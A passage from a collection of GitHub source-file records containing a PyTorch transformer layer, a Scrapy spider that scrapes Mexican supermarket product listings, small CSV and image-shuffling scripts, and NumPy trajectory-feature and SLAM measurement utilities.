nn.Linear(dim_feedforward, d_model)\n\n self.norm1 = nn.LayerNorm(d_model)\n self.norm2 = nn.LayerNorm(d_model)\n self.dropout1 = nn.Dropout(dropout)\n self.dropout2 = nn.Dropout(dropout)\n\n self.activation = F.relu\n\n self.debug_mode = False\n self.debug_name = None\n\n def with_pos_embed(self, tensor, pos: Optional[Tensor]):\n return tensor if pos is None else tensor + pos\n\n def forward_post(self,\n src,\n src_mask: 
Optional[Tensor] = None,\n src_key_padding_mask: Optional[Tensor] = None,\n pos: Optional[Tensor] = None):\n q = k = self.with_pos_embed(src, pos)\n src2, corr = self.self_attn(q, k, value=src, attn_mask=src_mask,\n key_padding_mask=src_key_padding_mask)\n \n\n src = src + self.dropout1(src2)\n src = self.norm1(src)\n src2 = self.linear2(self.dropout(self.activation(self.linear1(src))))\n src = src + self.dropout2(src2)\n src = self.norm2(src)\n return src\n\n def forward(self, src,\n src_mask: Optional[Tensor] = None,\n src_key_padding_mask: Optional[Tensor] = None,\n pos: Optional[Tensor] = None):\n return self.forward_post(src, src_mask, src_key_padding_mask, pos)\n\n\nclass TransformerDecoderLayer(nn.Module):\n\n def __init__(self, d_model, nhead, dim_feedforward=2048, dropout=0.1):\n super().__init__()\n self.self_attn = MultiheadAttention(d_model, nhead, dropout=dropout)\n self.multihead_attn = MultiheadAttention(d_model, nhead, dropout=dropout)\n # Implementation of Feedforward model\n self.linear1 = nn.Linear(d_model, dim_feedforward)\n self.dropout = nn.Dropout(dropout)\n self.linear2 = nn.Linear(dim_feedforward, d_model)\n\n self.norm1 = nn.LayerNorm(d_model)\n self.norm2 = nn.LayerNorm(d_model)\n self.norm3 = nn.LayerNorm(d_model)\n self.dropout1 = nn.Dropout(dropout)\n self.dropout2 = nn.Dropout(dropout)\n self.dropout3 = nn.Dropout(dropout)\n\n self.activation = F.relu\n\n\n self.debug_mode = False\n self.debug_name = None\n self.omit_selfattn = False\n\n def with_pos_embed(self, tensor, pos: Optional[Tensor]):\n return tensor if pos is None else tensor + pos\n\n def forward_post(self, tgt, memory,\n tgt_mask: Optional[Tensor] = None,\n memory_mask: Optional[Tensor] = None,\n tgt_key_padding_mask: Optional[Tensor] = None,\n memory_key_padding_mask: Optional[Tensor] = None,\n pos: Optional[Tensor] = None,\n query_pos: Optional[Tensor] = None):\n q = k = self.with_pos_embed(tgt, query_pos)\n\n if not self.omit_selfattn:\n tgt2, sim_mat_1 = self.self_attn(q, k, value=tgt, attn_mask=tgt_mask,\n key_padding_mask=tgt_key_padding_mask)\n\n tgt = tgt + self.dropout1(tgt2)\n tgt = self.norm1(tgt)\n\n tgt2, sim_mat_2 = self.multihead_attn(query=self.with_pos_embed(tgt, query_pos),\n key=self.with_pos_embed(memory, pos),\n value=memory, attn_mask=memory_mask,\n key_padding_mask=memory_key_padding_mask)\n \n tgt = tgt + self.dropout2(tgt2)\n tgt = self.norm2(tgt)\n\n tgt2 = self.linear2(self.dropout(self.activation(self.linear1(tgt))))\n tgt = tgt + self.dropout3(tgt2)\n tgt = self.norm3(tgt)\n return tgt\n\n def forward(self, tgt, memory,\n tgt_mask: Optional[Tensor] = None,\n memory_mask: Optional[Tensor] = None,\n tgt_key_padding_mask: Optional[Tensor] = None,\n memory_key_padding_mask: Optional[Tensor] = None,\n pos: Optional[Tensor] = None,\n query_pos: Optional[Tensor] = None):\n return self.forward_post(tgt, memory, tgt_mask, memory_mask,\n tgt_key_padding_mask, memory_key_padding_mask, pos, query_pos)\n\n\ndef _get_clones(module, N):\n return nn.ModuleList([copy.deepcopy(module) for i in range(N)])\n\n\ndef build_encoder(args):\n return Encoder(d_model=args.hidden_dim)\n","repo_name":"milkxie/SPML-LAC","sub_path":"lib/models/encoder.py","file_name":"encoder.py","file_ext":"py","file_size_in_byte":9162,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"19"} +{"seq_id":"1936418305","text":"import csv\n\nimport json\n\nimport scrapy\n\nfrom ..items import Product, Branch\n\nproductsUPC = []\nproducts = []\nbranches = []\n\n\nclass 
YemaSpider(scrapy.Spider):\n\n name = 'startSpider'\n\n allowed_domains = ['lacomer.com.mx', 'superama.com.mx']\n\n blocked_request = 0\n\n start_urls = [\n 'https://www.lacomer.com.mx/lacomer-api/api/v1/public/header/inicio?cambioSucc=false&succFmt=200&succId=409',\n 'https://www.superama.com.mx/common/GetMenu?storeId=9999/'\n ]\n\n def closed(self, reason):\n with open(\"products.csv\", \"w\", newline=\"\") as f:\n writer = csv.DictWriter(f, ['upc_gtin', 'brand', 'name', 'description', 'ingredients', 'package'])\n writer.writeheader()\n for data in products:\n writer.writerow(data)\n\n with open(\"branches.csv\", \"w\", newline=\"\") as f:\n writer = csv.DictWriter(f, ['product_id', 'chain', 'branch', 'price', 'category', 'product_url'])\n writer.writeheader()\n for data in branches:\n writer.writerow(data)\n\n print('=================================== RESUME ===================================')\n print('number of products ', len(products))\n print('number of branches ', len(branches))\n print('number of blocked request', self.blocked_request)\n print('PD. superama.com.mx return html view with a captcha, so json.loads crashing, that\\'s why requests are block ')\n print('==========================================================================================')\n\n def parse(self, response):\n # lacomer parse\n if 'lacomer.com.mx' in response.url:\n print(\"Surfing in lacomer.com.mx\")\n apartments = self.get_available_apartments(response)\n for apartment in apartments:\n url = 'https://www.lacomer.com.mx/lacomer-api/api/v1/public/pasilloestrucutra/totalarticulospasillo?agruId=' \\\n + str(apartment['id']) \\\n + '&succId=409'\n\n yield scrapy.Request(url, callback=self.parse_apartment,\n meta={'apartment_name': apartment['name'], 'apartment_id': apartment['id']})\n\n else:\n # superama parse\n print(\"Surfing in superama.com.mx\")\n apartments = self.get_available_apartments_family_line_superama(response)\n if len(apartments) > 0:\n for apartment in apartments:\n _apartment = apartment['apartment']\n _family = apartment['family']\n _line = apartment['line']\n url = 'https://www.superama.com.mx/buscador/resultadopaginadobeta?busqueda=' \\\n '&departamento=' + _apartment['seoUrlName'] + \\\n '&familia=' + _family['seoUrlName'] + \\\n '&linea=' + _line['seoUrlName'] + \\\n '&storeid=9999' \\\n '&IsLoggedUser=false' \\\n '&start=0' \\\n '&rows=300'\n\n yield scrapy.Request(url, callback=self.parse_apartments_family_line_superama)\n else:\n self.print_error(response)\n\n # lacomercial control\n\n def get_available_apartments(self, response):\n\n _apartments = []\n _notFood = [734, 93, 1328, 57, 87, 1215, 733, 53, 732, 78, 100, 949, 1, 1291, 50]\n\n _content = response.body\n _content = json.loads(_content)\n _content = _content[\"departamentos\"]\n for _apartment in _content:\n _apartment = _apartment.split(':')\n if len(list(filter(lambda x: x == int(_apartment[0]), _notFood))) == 0:\n _apartments.append({\n 'id': _apartment[0],\n 'name': _apartment[1]\n })\n\n return _apartments\n\n def parse_apartment(self, response):\n _name = response.meta.get('apartment_name')\n _id = response.meta.get('apartment_id')\n _content = response.body\n _content = json.loads(_content)\n _categories = _content['vecHijos']\n for _category in _categories:\n url = 'https://www.lacomer.com.mx/lacomer-api/api/v1/public/articulopasillo/articulospasillord?filtroSeleccionado=0' \\\n '&idPromocion=0' \\\n '&marca=' \\\n '&noPagina=1' \\\n '&numResultados=20' \\\n '&orden=-1' \\\n '&padreId=' + 
str(_category['agruId']) + \\\n '&parmInt=1' \\\n '&pasId=' + str(_id) + \\\n '&pasiPort=0' \\\n '&precio=' \\\n '&succId=409'\n\n yield scrapy.Request(url, callback=self.parse_product, meta={\n 'apartment': {'name': _name, 'id': _id},\n 'category': {'name': _category['agruDes'], 'id': _category['agruId']},\n })\n\n def parse_product(self, response):\n\n _products = response.body\n _products = json.loads(_products)\n _apartmentID = response.meta.get('apartment').get('id')\n _apartmentName = response.meta.get('apartment').get('name')\n _categoryID = response.meta.get('category').get('id')\n _categoryName = response.meta.get('category').get('name')\n\n for _product in _products['vecArticulo']:\n _urlProduct = 'https://www.lacomer.com.mx/lacomer/#!/detarticulo/' \\\n + str(_product['artEan']) + '/0/' + str(_apartmentID) + '/1///' \\\n + str(_apartmentID) + '?succId=409&succFmt=200'\n\n _upc = _product['artEan'][:-1]\n _upc = _upc.rjust(13, '0')\n\n if len(list(filter(lambda x: x == str(_upc), productsUPC))) == 0:\n _newProduct = Product()\n _newProduct['upc_gtin'] = _upc\n _newProduct['brand'] = _product['marDes']\n _newProduct['name'] = _product['artDestv']\n _newProduct['description'] = _product['artDes']\n _newProduct['ingredients'] = None\n _newProduct['package'] = str(_product['artUco']) + ' ' + str(_product['artTun'])\n yield _newProduct\n products.append(_newProduct)\n productsUPC.append(_upc)\n\n _newBranch = Branch()\n _newBranch['product_id'] = _upc\n _newBranch['chain'] = 'City Market'\n _newBranch['branch'] = 409\n _newBranch['price'] = '$' + str(_product['artPrven'])\n _newBranch['category'] = _apartmentName\n _newBranch['product_url'] = _urlProduct\n yield _newBranch\n branches.append(_newBranch)\n\n # superama control\n\n def get_available_apartments_family_line_superama(self, response):\n\n _apartments = []\n _notFood = ['_vinos_y_licores', 'd_jugos_y_bebidas', 'd_farmacia',\n 'd_lavanderia_hogar_y_mascotas', 'd_higiene_personal_y_belleza',\n 'd_bebes']\n\n try:\n _content = response.body\n _content = json.loads(_content)\n _content = _content['MenuPrincipal'][0]['Elements']\n for _apartment in _content:\n _nameApartment = _apartment['departmentName']\n if len(list(filter(lambda x: x == str(_nameApartment), _notFood))) == 0:\n for _family in _apartment['Elements']:\n for _line in _family['Elements']:\n _apartments.append({\n 'apartment': _apartment,\n 'family': _family,\n 'line': _line\n })\n\n except ValueError:\n self.print_error(response)\n _apartments = []\n\n return _apartments\n\n def parse_apartments_family_line_superama(self, response):\n try:\n _products = response.body\n _products = json.loads(_products)\n _products = _products['Products']\n for _product in _products:\n _upc = _product['Upc']\n url = 'https://www.superama.com.mx/consultar/pdp?upc=' + str(_upc) + '&store=9999'\n yield scrapy.Request(url, callback=self.parse_product_superama)\n except ValueError:\n self.print_error(response)\n\n def parse_product_superama(self, response):\n try:\n _product = response.body\n _product = json.loads(_product)\n _path = _product['UrlProducto']\n _urlProduct = 'https://www.superama.com.mx' + _path\n _upc = _product['Upc'].rjust(13, '0')\n\n if len(list(filter(lambda x: x == str(_upc), productsUPC))) == 0:\n _newProduct = Product()\n _newProduct['upc_gtin'] = _upc\n _newProduct['brand'] = _product['Brand']\n _newProduct['name'] = _product['Description']\n _newProduct['description'] = _product['Details']\n _newProduct['ingredients'] = _product['Ingredients']\n 
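# --- Editor's note (illustrative, not part of the original spider) ---\n# Both store parsers normalise identifiers to 13-digit GTINs by left-padding\n# with zeros via str.rjust(13, '0'); the La Comer branch above additionally\n# drops the trailing EAN check digit first ([:-1]). A hedged helper capturing\n# that convention (hypothetical name, not defined in this file):\n#   def normalize_upc(raw, drop_check_digit=False):\n#       return (raw[:-1] if drop_check_digit else raw).rjust(13, '0')\n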
_newProduct['package'] = None\n yield _newProduct\n products.append(_newProduct)\n productsUPC.append(_upc)\n\n _newBranch = Branch()\n _newBranch['product_id'] = _upc\n _newBranch['chain'] = 'Superama'\n _newBranch['branch'] = 9999\n _newBranch['price'] = _product['PriceString']\n _newBranch['category'] = _product['SeoDisplayLineaUrlName']\n _newBranch['product_url'] = _urlProduct\n\n yield _newBranch\n branches.append(_newBranch)\n\n except ValueError:\n self.print_error(response)\n\n def print_error(self, response):\n # superama.com.mx return html view with a captcha, so json.loads crash\n self.blocked_request = self.blocked_request + 1\n print('#', self.blocked_request,\n ' : The request was blocked by superama.com.mx, please use a proxy, change IP or take a rest',\n '\\n',\n response.url)","repo_name":"4nakata/YEMA-Coding-Challenge","sub_path":"yema/yema/spiders/YamaSpider.py","file_name":"YamaSpider.py","file_ext":"py","file_size_in_byte":10166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"71636132204","text":"import csv\n\nwith open('GDS5.txt') as csvfile:\n lines = csv.reader(csvfile, delimiter='\\t')\n\n for index, line in enumerate(lines):\n # remove as duas primeiras colunas\n del line[0:2]\n\n soma = 0\n for value in line:\n soma += float(value)\n \n media = soma/len(line)\n\n print( 'Media da linha {} é: {}'.format(index+1, media ) )\n","repo_name":"AnaHauachen/Bioinformatics","sub_path":"médialinhas.py","file_name":"médialinhas.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"5187850971","text":"import numpy as np\n\n\ndef curvature(xs, ys):\n \"\"\"\n Curvature for each point on a parametric curve.\n\n Curvature will be zero for a line and larger the more it deviates from a line.\n\n Parameters\n ----------\n xs : ndarray, shape (n_curves, n_pts)\n X coordinates.\n ys : ndarray, shape (n_curves, n_pts)\n Y coordinates.\n\n Returns\n -------\n k : ndarray, shape (n_curves, n_pts)\n Curvature for each point\n\n See Also\n --------\n https://www.khanacademy.org/math/multivariable-calculus/multivariable-derivatives/curvature\n \"\"\"\n x_prime = np.gradient(xs, axis=1, edge_order=2)\n y_prime = np.gradient(ys, axis=1, edge_order=2)\n xy_prime_mag = np.linalg.norm(np.dstack((x_prime, y_prime)), axis=2)\n\n Tx = x_prime / xy_prime_mag\n Ty = y_prime / xy_prime_mag\n\n Tx_prime = np.gradient(Tx, axis=1, edge_order=2)\n Ty_prime = np.gradient(Ty, axis=1, edge_order=2)\n Txy_prime_mag = np.linalg.norm(np.dstack((Tx_prime, Ty_prime)), axis=2)\n\n # curvature of each point of each curve\n k = Txy_prime_mag / xy_prime_mag\n\n return k\n\n\n#TODO: implement fps arguments\ndef velocity(lines, fps=None):\n \"\"\"\n Compute velocity between pairs of points. 
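# --- Editor's note (illustrative, not part of the original module) ---\n# Sanity check for curvature() above: every point of a circle of radius r has\n# curvature 1/r, so a sketch like this (hypothetical usage, with NumPy\n# imported as np as above) should return values near 0.2 away from the ends:\n#   t = np.linspace(0, 2 * np.pi, 400)\n#   xs = (5.0 * np.cos(t))[None, :]   # one curve of radius 5\n#   ys = (5.0 * np.sin(t))[None, :]\n#   k = curvature(xs, ys)             # expect k close to 1/5 = 0.2\n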
\n    \n    Parameters\n    ----------\n    lines : ndarray, shape (n_lines, n_pts, 2)\n        Lines for which to compute the velocity.\n    \n    Returns\n    -------\n    v : ndarray, shape (n_lines, n_pts, 2)\n        x and y components of velocity between each pair of points.\n    \n    References\n    ----------\n    http://mathworld.wolfram.com/VelocityVector.html\n    \"\"\"\n    x_prime = []\n    y_prime = []\n    for i in range(len(lines)):\n        x_prime.append(np.gradient(lines[i, :, 0], edge_order=2))\n        y_prime.append(np.gradient(lines[i, :, 1], edge_order=2))\n    x_prime = np.array(x_prime)\n    y_prime = np.array(y_prime)\n\n    if fps is not None:\n        pass\n\n    return np.rollaxis(np.array((x_prime, y_prime)), axis=0, start=3)\n\n\ndef average_velocity(coords):\n    \"\"\"\n    Average velocity for points on a parametric curve.\n\n    Helps separate tracklets moving at varying pace.\n\n    Parameters\n    ----------\n\n    Returns\n    -------\n\n    References\n    ----------\n    Anjum, Nadeem, and Andrea Cavallaro. \"Multifeature object trajectory clustering for video analysis.\" IEEE\n    Transactions on Circuits and Systems for Video Technology 18.11 (2008): 1555-1564.\n    \"\"\"\n    n_pts = coords.shape[1]\n    return (1/(n_pts-1)) * np.sum(coords[:, 1:, :] - coords[:, :-1, :], axis=1)\n\n\ndef directional_distance(coords):\n    \"\"\"Directional distance between first and last points in tracklet.\n\n    Encodes the direction of motion and helps distinguish longer tracklets from shorter ones\n    and also tracklets in opposite directions.\n\n    Parameters\n    ----------\n    coords\n\n    Returns\n    -------\n\n    References\n    ----------\n    Anjum, Nadeem, and Andrea Cavallaro. \"Multifeature object trajectory clustering for video analysis.\" IEEE\n    Transactions on Circuits and Systems for Video Technology 18.11 (2008): 1555-1564.\n    \"\"\"\n    return coords[:, -1, :] - coords[:, 0, :]\n\n\ndef trajectory_mean(coords):\n    \"\"\"Trajectory mean.\n\n    Helps distinguish tracklets belonging to different regions on the image plane.\n\n    Parameters\n    ----------\n    coords\n\n    Returns\n    -------\n\n    References\n    ----------\n    Anjum, Nadeem, and Andrea Cavallaro. \"Multifeature object trajectory clustering for video analysis.\" IEEE\n    Transactions on Circuits and Systems for Video Technology 18.11 (2008): 1555-1564.\n    \"\"\"\n    n_pts = coords.shape[1]\n    return (1/n_pts) * coords.sum(axis=1)\n\n\ndef directional_histogram(coords, n_bins):\n    \"\"\"\n    Trajectory directional histogram.\n\n    Parameters\n    ----------\n    coords\n    n_bins : int\n        Number of bins. The interval [-pi,pi) will be divided into n_bins\n        equal subintervals. The length of each subinterval is 2*pi/n_bins.\n\n    Returns\n    -------\n    hist\n\n    References\n    ----------\n    Anjum, Nadeem, and Andrea Cavallaro. 
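# --- Editor's note (illustrative, not part of the original module) ---\n# Worked example for directional_histogram() defined here: with n_bins=4 the\n# bin edges are [-pi, -pi/2, 0, pi/2, pi], so a tracklet moving straight to\n# the right (all step angles 0) puts all of its mass in the third bin:\n#   coords = np.array([[[0, 0], [1, 0], [2, 0], [3, 0]]], dtype=float)\n#   hist, bins = directional_histogram(coords, n_bins=4)\n#   # hist is approximately [[0., 0., 1., 0.]] after per-trajectory scaling\n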
\"Multifeature object trajectory clustering for video analysis.\" IEEE\n Transactions on Circuits and Systems for Video Technology 18.11 (2008): 1555-1564.\n\n \"A Coarse-to-Fine Strategy for Vehicle Motion Trajectory Clustering\", Li, Xi et al.\n \"\"\"\n x = coords[:, :, 0]\n y = coords[:, :, 1]\n\n dx = x[:, 1:] - x[:, :-1]\n dy = y[:, 1:] - y[:, :-1]\n\n # angles = np.arctan2(dy, dx) * 180 / np.pi\n # angles[angles<0] = angles[angles<0] + 360.0\n angles = np.arctan2(dy, dx)\n\n bins = np.linspace(-np.pi, np.pi, n_bins+1, endpoint=True)\n hist = np.apply_along_axis(lambda a: np.histogram(a, bins=bins)[0], 1, angles)\n # normalize\n total_pts = angles.shape[1]\n hist = hist / total_pts\n\n return hist, bins\n\n\n# def curvature2(xs, ys):\n# \"\"\"\n# Sum of curvatures for each point on a parametric curve.\n#\n# Curvature will be zero for a line and larger the more it deviates from a line.\n#\n# Parameters\n# ----------\n# xs : ndarray, shape (n_curves, n_pts)\n# X coordinates.\n# ys : ndarray, shape (n_curves, n_pts)\n# Y coordinates.\n#\n# Returns\n# -------\n# S : ndarray, shape (n_curves,)\n# Sum of curvature values for each point.\n#\n# See Also\n# --------\n# https://www.khanacademy.org/math/multivariable-calculus/multivariable-derivatives/curvature\n# \"\"\"\n# dx = np.gradient(xs)\n# ddx = np.gradient(dx)\n# dy = np.gradient(ys)\n# ddy = np.gradient(dy)\n#\n# num = dx * ddy - dy * ddx\n# denom = (dx * dx + dy * dy) ** (3 / 2)\n#\n# k = num / denom\n#\n# # sum curvatures of points for each curve\n# S = np.sum(k, axis=1)\n#\n# return S\n\n##################################################\n# Normalize feature spaces of each ROI separately\n##################################################\n# track_features_norm = {name: np.empty_like(track_features[name]) for name in track_features}\n# for name, arr in track_features.items():\n# for roi, track_inds in zip(roi_unq, roi_unq_tracks):\n# track_features_norm[name][track_inds] = preprocessing.scale(track_features[name][track_inds])\n\n\n##############################################################\n# Visualize feature space vs normed feature space for each ROI\n##############################################################\n# outfile = os.path.join(BASE_OUTPUT_DIR, 'trajectory_features_normalized.pdf')\n# print('Saving {} ...'.format(outfile))\n#\n# with tempfile.TemporaryDirectory() as tmpdir:\n# for roi, track_inds in zip(roi_unq, roi_unq_tracks):\n# # there is a problem with numpy arrays containing single elements so for now just duplicate the\n# # element to create an array of length 2 if a length 1 array is present\n# if len(track_inds) == 1:\n# track_inds = np.repeat(track_inds, 2)\n#\n# fname = os.path.splitext(os.path.basename(roi))[0]+'.pdf'\n# print('Saving {}'.format(fname))\n#\n# fig, axes = plt.subplots(nrows=2, ncols=len(track_features))\n# fig.suptitle(fname)\n#\n# # fill first row with features\n# for feat_idx, name in enumerate(sorted(track_features.keys())):\n# # save plot as image to file\n# # see http://stackoverflow.com/questions/37945495/python-matplotlib-save-as-tiff on how to save to memory rather than a file\n# g = sns.jointplot(track_features[name][track_inds, 0],\n# track_features[name][track_inds, 1],\n# kind='scatter', s=6, size=5)\n# g.set_axis_labels(feature_plot[name]['xlabel'], feature_plot[name]['ylabel'])\n# g.savefig(os.path.join(tmpdir, 'tmpimg.png'), bbox_inches='tight', pad_inches=0, dpi=300)\n# plt.close(g.fig)\n#\n# # read image from file and show in axes\n# img = misc.imread(os.path.join(tmpdir, 
'tmpimg.png'))\n# axes[0, feat_idx].axis('off')\n# axes[0, feat_idx].imshow(img, aspect='equal', interpolation='none')\n# axes[0, feat_idx].set_title(feature_plot[name]['title'], fontsize=6)\n#\n# # fill second row with normalized features\n# for feat_idx, name in enumerate(sorted(track_features_norm.keys())):\n# # save plot as image to file\n# # see http://stackoverflow.com/questions/37945495/python-matplotlib-save-as-tiff on how to save to memory rather than a file\n# g = sns.jointplot(track_features_norm[name][track_inds, 0],\n# track_features_norm[name][track_inds, 1],\n# kind='scatter', s=6, size=5)\n# g.set_axis_labels(feature_plot[name]['xlabel'], feature_plot[name]['ylabel'])\n# g.savefig(os.path.join(tmpdir, 'tmpimg.png'), bbox_inches='tight', pad_inches=0, dpi=300)\n# plt.close(g.fig)\n#\n# # read image from file and show in axes\n# img = misc.imread(os.path.join(tmpdir, 'tmpimg.png'))\n# axes[1, feat_idx].axis('off')\n# axes[1, feat_idx].imshow(img, aspect='equal', interpolation='none')\n# axes[1, feat_idx].set_title('Normal '+feature_plot[name]['title'], fontsize=6)\n#\n# fig.savefig(os.path.join(tmpdir, fname))\n# plt.close(fig)\n#\n# # merge the pdf pages into a single pdf\n# pdfs = [os.path.join(tmpdir, f) for f in os.listdir(tmpdir) if f.endswith('.pdf')]\n# merger = PdfFileMerger()\n# for pdf in pdfs:\n# merger.append(FileIO(pdf, 'rb'))\n# merger.write(outfile)\n\n\n\n####################################################################################\n# Removing straight trajectories\n####################################################################################\n# compute curvature for each trajectory, removing any lines where curvature is nan/inifinite\n# mask = np.all(np.isfinite(curvature), axis=1)\n# curve = curve[mask]\n# roinames = roinames[mask]\n\n# threshold curvature to remove straight trajectories\n# mask = np.any(curve < curve_threshold, axis=1)\n# n_bad_tracks = len(np.flatnonzero(mask))\n# print('# of straight trajectories removed: {} ({:.2%})'.format(n_bad_tracks, n_bad_tracks/len(tracks)))\n# rois_uniq, unq_inv, unq_cnt = np.unique(tracks['video'], return_counts=True, return_inverse=True)\n# tr_indices = np.split(np.argsort(unq_inv), np.cumsum(unq_cnt[:-1]))\n#\n# # save pdf of all ROIs and the removed straight trajectories\n# labels = np.zeros(len(tracks), dtype=np.int)\n# labels[mask] = 1\n# for roiname, ind in zip(rois_uniq, tr_indices):\n# fname = os.path.splitext(os.path.basename(roiname))[0] + '.pdf'\n# print('Saving {}'.format(fname))\n# plot.trajectory_3d(tracks['coords'][ind], tracks['frame_num'][ind],\n# groups=labels[ind],\n# save_path=os.path.join(BASE_OUTPUT_DIR, fname))\n\n# trs = tracks[curve_mask]\n# labels = np.zeros(len(trs), np.int)\n# print('Saving pruned tracks (2d and 3d) ...')\n# plot.roi_track_clusters(os.path.join(BASE_OUTPUT_DIR, 'pruned_tracks_3d.pdf'),\n# trs['video'], trs['coords'], labels, '3d', trs['frame_num'], progress=True)\n# plot.roi_track_clusters(os.path.join(BASE_OUTPUT_DIR, 'pruned_tracks_2d.pdf'),\n# trs['video'], trs['coords'], labels, '2d', progress=True)\n\n\n","repo_name":"marximus/cilia-trajectory-cluster","sub_path":"tracklet/tracklet/features.py","file_name":"features.py","file_ext":"py","file_size_in_byte":11333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"20233298040","text":"import sys\nimport random\nfrom PIL import Image\n\ndef resize_to_even(im: Image) -> Image:\n '''画像の幅/高さが偶数になるようにcropする'''\n width, height = im.size\n\n if width 
% 2 == 1:\n        width -= 1\n    if height % 2 == 1:\n        height -= 1\n    \n    cropped = im.crop((0, 0, width, height))\n    return cropped\n\ndef crop_image(im: Image) -> [Image]:\n    '''Split the image into four quadrants.'''\n    im = resize_to_even(im)\n\n    width, height = im.size\n    half_width = width // 2\n    half_height = height // 2\n\n    boxes = [\n        (0, 0, half_width, half_height), # top-left\n        (0, half_height, half_width, height), # bottom-left\n        (half_width, half_height, width, height), # bottom-right\n        (half_width, 0, width, half_height), # top-right\n    ]\n\n    cropped_imgs = []\n    for box in boxes:\n        cropped_img = im.crop(box)\n        cropped_imgs.append(cropped_img)\n\n    return cropped_imgs\n\ndef shuffle_and_concat(ims: [Image]) -> Image:\n    '''Shuffle the four tiles, randomly mirroring each one, and join them\n    in top-left, bottom-left, bottom-right, top-right order.\n    '''\n    width, height = ims[0].size\n    width *= 2\n    height *= 2\n    dst = Image.new('RGB', (width, height))\n    half_width, half_height = ims[0].size\n    for box in [(0, 0), (0, half_height), (half_width, half_height), (half_width, 0)]:\n        im = random.choice(ims)\n        if random.random() < .5:\n            im = im.transpose(Image.FLIP_LEFT_RIGHT)\n        if random.random() < .5:\n            im = im.transpose(Image.FLIP_TOP_BOTTOM)\n        dst.paste(im, box)\n\n    return dst\n\nif __name__ == '__main__':\n    im = Image.open(sys.argv[1])\n    ims = crop_image(im)\n    out = shuffle_and_concat(ims)\n    out.save('out.jpg')\n","repo_name":"utgwkk/yabaiwayo","sub_path":"yabaiwayo.py","file_name":"yabaiwayo.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}{"seq_id":"69929520045","text":"from utils.angle_utils import normalize_angle_pi_minus_pi\n\nimport numpy as np\n\nfrom collections import namedtuple, OrderedDict\nimport math\nimport random as rnd\nfrom typing import List\n\n\ndef add_measurement_to_pose(pose, measurement):\n    \"\"\"\n    Returns the position acquired by applying a [range, heading] measurement to a [x, y, heading] pose.\n    :param pose: A pose in the form of [x, y, heading(rad)].\n    :param measurement: A measurement in the form of [range, heading(rad)]\n    :return: The resulting position as a (x, y) tuple.\n    \"\"\"\n    x = pose[0] + math.cos(measurement[1] + pose[2]) * measurement[0]\n    y = pose[1] + math.sin(measurement[1] + pose[2]) * measurement[0]\n\n    return float(x), float(y)\n\n\ndef calculate_landmark_distance(pose, landmark):\n    return np.linalg.norm(landmark[:2] - pose[:2])\n\n\ndef calculate_landmark_heading(pose, landmark):\n    x_landmark = landmark[0]\n    y_landmark = landmark[1]\n    x_state = pose[0]\n    y_state = pose[1]\n\n    phi = math.atan2(y_landmark - y_state, x_landmark - x_state)\n    phi = phi - pose[2]\n    phi = normalize_angle_pi_minus_pi(phi)\n\n    return phi\n\n\nLandmarkDistanceIndex = namedtuple(\"LandmarkDistanceIndex\", \"landmark distance index\")\n\n\ndef get_landmarks_in_range(ground_truth_state, landmarks, max_sensing_range):\n    landmark_distances = [np.linalg.norm(landmark[:2] - ground_truth_state[:2]) for landmark in landmarks]\n    return [LandmarkDistanceIndex(landmark, landmark_distances[index], index) for index, landmark in\n            enumerate(landmarks) if landmark_distances[index] <= max_sensing_range]\n\n\ndef calculate_measurement_vector_for_detection(ground_truth_state, landmark_distance_index):\n    return np.array([[landmark_distance_index.distance,\n                      calculate_landmark_heading(ground_truth_state, landmark_distance_index.landmark),\n                      landmark_distance_index.landmark[2]]]).T\n\n\ndef add_noise_to_measurements_for_state(measurements_for_state, distance_deviation, heading_deviation):\n    for measurement in measurements_for_state:\n        
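# --- Editor's note (illustrative, not part of the original module) ---\n# add_measurement_to_pose() above implements the usual range-bearing model\n#   x = x0 + r * cos(theta0 + phi),  y = y0 + r * sin(theta0 + phi)\n# e.g. a robot at (0, 0) with heading 0 that measures range 2 at bearing\n# pi/2 places the landmark at (0, 2):\n#   add_measurement_to_pose([0.0, 0.0, 0.0], [2.0, math.pi / 2])  # ~(0.0, 2.0)\n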
measurement[0] = measurement[0] + rnd.normalvariate(0, distance_deviation)\n measurement[1] = measurement[1] + rnd.normalvariate(0, heading_deviation)\n measurement[1] = normalize_angle_pi_minus_pi(measurement[1])\n\n return measurements_for_state\n\n\ndef compress_correspondences(correspondences: List[List[int]]) -> List[List[int]]:\n \"\"\"\n Maps the given correspondence indices to a new set of indices, which start from zero (in order of appearance in the\n original correspondence lists), and are tightly increasing. NOTE: also modifies the input list!\n\n >>> compress_correspondences([[5, 8], [5, 9], [8, 9], [9, 5, 8]])\n [[0, 1], [0, 2], [1, 2], [2, 0, 1]]\n\n :param correspondences: list of correspondence lists for each state\n :return compressed correspondences\n \"\"\"\n flat_correspondences = [correspondence for correspondences_for_state in correspondences for correspondence in\n correspondences_for_state]\n\n original_correspondence_indices = list(OrderedDict.fromkeys(flat_correspondences))\n\n original_to_target = {original_correspondence_index: index for index, original_correspondence_index in\n enumerate(original_correspondence_indices)}\n\n for index, original_correspondences_for_state in enumerate(correspondences):\n correspondences[index] = [original_to_target[original_correspondence] for original_correspondence in\n original_correspondences_for_state]\n\n return correspondences\n\n\ndef generate_measurements(ground_truth_states, landmarks, max_sensing_range, sensing_range_deviation,\n distance_deviation, heading_deviation):\n \"\"\"\n Generates a list of measurements for every state in ground_truth_states. Measurements are numpy arrays of\n [r, phi, s].T, r being the distance to landmark, phi is heading (positive X direction is 0 rad, grows\n counter-clockwise), s is the landmark descriptor - an integer. Measurements contain additional zero-mean gaussian\n noise for the distance and heading, as specified by distance_deviation and heading_deviation.\n\n For each state, only landmarks within max_sensing_range are considered. 
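# --- Editor's note (illustrative, not part of the original docstring) ---\n# Under this sampling rule a landmark at distance d is kept with probability\n# P(|N(0, sensing_range_deviation)| >= d): e.g. for sensing_range_deviation=5,\n# a landmark at d=2 is detected with probability 2*(1 - Phi(0.4)) ~= 0.69,\n# while one at d=10 only with ~= 0.05.\n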
